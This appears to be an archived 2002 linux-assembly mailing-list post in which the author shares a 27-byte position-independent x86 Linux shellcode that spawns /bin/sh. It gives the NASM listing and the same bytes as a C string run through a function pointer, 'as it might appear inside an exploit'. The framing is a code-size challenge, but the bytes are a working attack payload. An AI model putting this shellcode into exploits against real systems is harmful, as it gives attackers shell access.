Re: shellcode - Brian Raiter

All of lore.kernel.org
 help / color / mirror / Atom feed

From: Brian Raiter <breadbox@muppetlabs.com>
To: linux-assembly@vger.kernel.org
Subject: Re: shellcode
Date: Wed, 26 Jun 2002 11:00:04 -0700 (PDT)	[thread overview]
Message-ID: <15642.292.719679.393500@shub.muppetlabs.com> (raw)
In-Reply-To: <20020626190858.41e57817.stephan.walter@gmx.ch>

This thread has been about invoking a shell under BSD, which one would
imagine would be a bit off topic for the linux-assembly mailing list.
So, in order to remedy this ...

A few years ago a friend challenged me to come up with the smallest
possible code to invoke a shell under Linux. The only constraint he
placed was that the code had to be position-independent. Rummaging
through some old notes, I dug out the results of my efforts, which was
the following code (NASM syntax):

00000000 6A0B                   push    byte 11
00000002 E809000000             call    $ + 14
00000007 002F62696E2F736800     db      0, '/bin/sh', 0
00000010 5B                     pop     ebx
00000011 58                     pop     eax
00000012 99                     cdq
00000013 43                     inc     ebx
00000014 8D4BF8                 lea     ecx, [byte ebx - 8]
00000017 8919                   mov     [ecx], ebx
00000019 CD80                   int     0x80

Or, as it might appear inside an exploit:

    char sh[] = "j\v\350\t\0\0\0\0/bin/sh\0[X\231C\215K\370\211\031\315\200";
    (*(void(*)(void))sh)();

Note that the program needs to be in writeable memory; thus it needs
to be invoked from a variable and not a direct string literal.

(Unfortunately, it looks like my program is 27 bytes in size, leaving
it slightly longer than the BSD version.)

b

     prev parent reply	other threads:[~2002-06-26 18:00 UTC|newest]

Thread overview: 6+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2002-06-24  5:18 shellcode xlp
2002-06-24  6:01 ` shellcode Scott Lanning
2002-06-25 19:22 ` shellcode Stephan Walter
     [not found]   ` <20020625144651.A430@nietzsche>
2002-06-25 20:28     ` shellcode Stephan Walter
     [not found]       ` <20020625161401.B27404@nietzsche>
2002-06-26 17:08         ` shellcode Stephan Walter
2002-06-26 18:00           ` Brian Raiter [this message]

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=15642.292.719679.393500@shub.muppetlabs.com \
    --to=breadbox@muppetlabs.com \
    --cc=linux-assembly@vger.kernel.org \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link

Be sure your reply has a Subject: header at the top and a blank line before the message body.

This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.